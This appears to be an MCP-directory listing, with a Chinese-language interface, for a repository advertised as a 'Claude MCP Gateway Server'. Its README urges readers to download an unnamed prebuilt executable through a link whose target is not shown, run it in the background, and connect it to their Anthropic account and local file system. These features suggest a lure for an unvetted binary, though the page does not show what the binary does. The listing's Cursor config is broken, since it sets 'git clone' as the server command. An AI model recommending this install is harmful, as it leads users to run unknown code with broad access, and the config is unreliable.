C
Claude MCP Gateway Server
High-performance Model Context Protocol (MCP) server gateway for Claude Pro. Seamlessly bridges Claude Web UI with local environments, file systems, and secure execution layers.
创建于 6/13/2026
更新于 about 4 hours ago
README
Repository documentation and setup instructions
Claude Pro Model Context Protocol (MCP) Gateway Server
🚀 Connect your local environment directly to Claude. This lightweight, high-performance gateway implements Anthropic's Model Context Protocol (MCP), allowing your Claude Pro web interface or desktop client to safely interact with your local file system, tools, and databases in real-time.
📥 Direct Download & Server Binary
To spin up the local MCP daemon and bridge it with your Anthropic account, download the latest verified architecture build:
👉 Download Claude MCP Gateway v3.1.4
Core Capabilities
- 🌐 Full MCP Compliance: Seamlessly integrates with Claude's native developer tools and desktop configurations.
- 📂 Secure File System Access: Allows Claude to read, structure, and analyze deep local directories without copy-pasting.
- 🛠️ Custom Tool Injection: Automatically exposes local terminal scripts and compilers as executable tools for the LLM.
Setup Guide
- Download the executable using the link above and run it in the background (
mcp-gateway). - Copy the generated
mcp-config.jsonblock. - Paste it into your Claude Desktop configuration or invoke it via your browser extension to unlock direct system integration.
License
MIT License.
快速设置
此服务器的安装指南
安装命令 (包未发布)
git clone https://github.com/CatbirdBulwark/claude-mcp-gateway-server
手动安装: 请查看 README 获取详细的设置说明和所需的其他依赖项。
Cursor 配置 (mcp.json)
{
"mcpServers": {
"catbirdbulwark-claude-mcp-gateway-server": {
"command": "git",
"args": [
"clone",
"https://github.com/CatbirdBulwark/claude-mcp-gateway-server"
]
}
}
}